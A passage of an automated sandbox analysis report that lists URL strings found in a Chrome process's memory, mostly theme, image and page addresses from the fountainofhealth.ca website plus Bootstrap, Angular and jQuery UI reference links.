                                  Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/youtube.svg
                                  Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/youtube.svgg
                                  Source: chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC0490C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29
                                  Source: chrome.exe, 00000000.00000002.2490296198.000028EC03F64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/t
                                  Source: chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467653990.000028EC02270000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/th.ca/
                                  Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484699862.000028EC03718000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/dialog.js?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2491036779.000028EC0402C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495335688.000028EC047D8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491256401.000028EC04045000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/drupal.bootstrap.js?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467653990.000028EC02270000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/ajax.js?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC0490C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/message.js?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500311139.000028EC06614000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491141569.000028EC04034000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/progress.js?swjs7b
                                  Source: chrome.exe, 00000000.00000003.2319331070.000028EC06828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/progress.js?swjs7baDb
                                  Source: chrome.exe, 00000000.00000002.2496387557.000028EC04944000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484699862.000028EC03718000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2491256401.000028EC04045000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b
                                  Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/modal.js?swjs7b
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/css/img/icons8-search-28.png
                                  Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/css/questionnaire.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/css/questionnaire.css?swjs7btured-2.jpg
                                  Source: chrome.exe, 00000000.00000002.2489880900.000028EC03EE0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7b
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/Aging_featured-2.jpg
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/doctor-21.jpg
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/speakers-420.jpg
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/speakers-420.jpgjpg
                                  Source: chrome.exe, 00000000.00000002.2491036779.000028EC0402C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496640859.000028EC04998000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/banner-slider.js?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2504370678.000028EC078C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/banner-slider.js?swjs7ba
                                  Source: chrome.exe, 00000000.00000002.2504370678.000028EC078C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/banner-slider.js?swjs7baDb
                                  Source: chrome.exe, 00000000.00000003.2371195957.000028EC04024000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/custom.js?swjs7b
                                  Source: chrome.exe, 00000000.00000003.2371195957.000028EC04024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/custom.js?swjs7b:491:6
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/script.js?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/thrive--quiz
                                  Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/thrive-c-approach-wellbeing
                                  Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499781921.000028EC06410000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/thrive/additional-tools-and-links
                                  Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/thrive/additional-tools-and-linksv=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/thrive/emotions
                                  Source: chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500311139.000028EC06614000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/thrive/end-user-licence-agreement
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/thrive/health-habits
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/thrive/interests
                                  Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/thrive/privacy-policy
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/thrive/relationship
                                  Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344648335.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344735211.000028EC02578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501198410.000028EC068C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/thrive/request-a-speaker#request-speaker
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/thrive/resources
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/thrive/sitemap
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/thrive/thoughts
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/thrive/valued-goals
                                  Source: chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/toolkit
                                  Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca:443
                                  Source: chrome.exe, 00000000.00000002.2501591890.000028EC06B12000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484400894.000028EC036F9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca_default
                                  Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2503938588.000028EC0782C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.cadate:Thu
                                  Source: chrome.exe, 00000000.00000002.2501591890.000028EC06B12000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484400894.000028EC036F9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.cawww.youtube.com_default
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/)
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#affix
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#alerts
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#buttons
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#carousel
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#collapse
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#dropdowns
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#modals
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#popovers
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#scrollspy
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#tabs
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#tooltip
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#transitions
                                  Source: chrome.exe, 00000000.00000003.2320348249.000028EC05C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/angular/angular.js/blob/v1.4.4/src/ng/urlUtils.js
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/angular/angular/blob/7.2.4/packages/core/src/sanitization/url_sanitizer.ts
                                  Source: chrome.exe, 00000000.00000003.2320348249.000028EC05C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/jquery/jquery-ui/blob/1.11.4/ui/tabs.js#L53
                                  Source: chrome.exe, 00000000.00000003.2320348249.000028EC05C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/jquery/jquery-ui/blob/1.11.4/ui/tabs.js#L58
